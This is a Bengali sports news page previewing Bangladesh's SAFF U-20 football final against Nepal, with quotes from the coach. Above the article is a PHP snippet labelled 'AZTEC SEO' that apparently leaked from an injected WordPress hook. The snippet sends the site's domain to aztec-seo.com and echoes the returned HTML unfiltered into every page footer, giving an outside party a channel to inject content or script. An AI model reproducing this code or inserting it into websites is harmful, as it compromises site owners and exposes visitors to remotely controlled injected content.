/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); শিরোপাই লক্ষ্য বাংলাদেশের | Dhaka Sky News

ফিলিস্তিনিদের প্রতি সমর্থন পুনর্ব্যক্ত করেছেন সৌদি যুবরাজ

আগের সংবাদ

পূর্ণদৈর্ঘ্য চলচ্চিত্র নিয়ে উচ্ছ্বসিত মেহজাবিন

পরের সংবাদ

শিরোপাই লক্ষ্য বাংলাদেশের

ঢাকা স্কাইনিউজ রিপোর্ট

প্রকাশিত: August 28, 2024 , 1:47 pm

আজ জিতলেই শিরোপা উঠবে পিয়াস আহমেদদের হাতে। দু’দিন আগে পাকিস্তানকে প্রথমবারের মতো টেস্টে হারিয়েছে বাংলাদেশ। শান্তরা পাকিস্তানের মাটিতে ম্যাচটি জিতেছে ১০ উইকেটের বড় ব্যবধানে।

পাকিস্তানের বিপক্ষে পাওয়া ঐতিহাসিক জয়টা বৈষম্যবিরোধী ছাত্র আন্দোলনে পুলিশের গুলিতে নিহতদের উৎসর্গ করেছিলেন অধিনায়ক নাজমুল হাসান শান্ত।

সাফ অনূর্ধ্ব-২০ চ্যাম্পিয়নশিপেও ছাত্র আন্দোলনে নিহত আবু সাঈদ-মুগ্ধদের স্মরণ করেন বাংলাদেশি ফুটবলার। এবার তাদের জন্য ট্রফি নিয়ে আসতে চাইছেন তারা। সেখানে তাদের বাধা নেপাল।

স্বাগতিকদের বিপক্ষে বাংলাদেশ সময় বেলা পৌনে তিনটায় আনফা কমপ্লেক্সে ম্যাচটি শুরু হবে।

বয়সভিত্তিক এই প্রতিযোগিতাটি এ পর্যন্ত অনূর্ধ্ব-১৮, ১৯ ও ২০ এই তিন ক্যাটাগরিতে হয়েছে।

২০২২ সালে অনূর্ধ্ব-২০ ক্যাটাগরিতে ভারতের কাছে হেরে রানার্সআপ হয়েছিল বাংলাদেশ। এবার তাদের হারিয়েই ফাইনালে উঠেছেল মিরাজুল আসাদুলরা। এবার সেই আক্ষেপ মেটাতে চান কোচ মারুফুল হকের শিষ্যরা।

আজ জিততে পারলেই শিরোপা উঠবে পিয়াস আহমেদদের হাতে। মাঠে নামার আগে প্রতিপক্ষ হিসেবে নেপাল ভাবাচ্ছে লাল সবুজের শিবিরকে।

একই গ্রুপে থাকায় গ্রুপ পর্বেও দেখা হয়েছিল এই দুই দলের। যেখানে জয় নিয়ে মাঠ ছাড়া হয়নি বাংলাদেশের। হেরেছিল ২-১ গোলে। তবে ওই ম্যাচের ভুল শুধরে সেমিফাইনালে ভারতের বিপক্ষে জিতে ঘুরে দাঁড়িয়েছে বাংলাদেশের যুবারা।

ফাইনালেও শিষ্যদের সেই ধারাবাহিকতা দেখতে চান বাংলাদেশের কোচ মারুফুল হক।

তিনি বলেন, ‘আমাদের লক্ষ্য ছিল ফাইনাল খেলবো, চ্যাম্পিয়ন হবো। যদিও গ্রুপ পর্বে নেপালের কাছে হেরেছি। এরপর খেলোয়াড়দের নানাভাবে উজ্জীবিত করেছি। ভারতের বিপক্ষে জিতে এখন স্বপ্নের শেষ ধাপে আমরা। নেপালকে হারাতে পারলেই শিরোপা নিয়ে দেশে ফিরতে পারবো।’

তিনি যোগ করেন, ‘নেপাল ভালো দল। তাদের বেশ ক’জন মেধাবী খেলোয়াড়ও আছে। আশা করি ফাইনাল প্রতিদ্বন্দ্বিতাপূর্ণ হবে।’

বিষয়: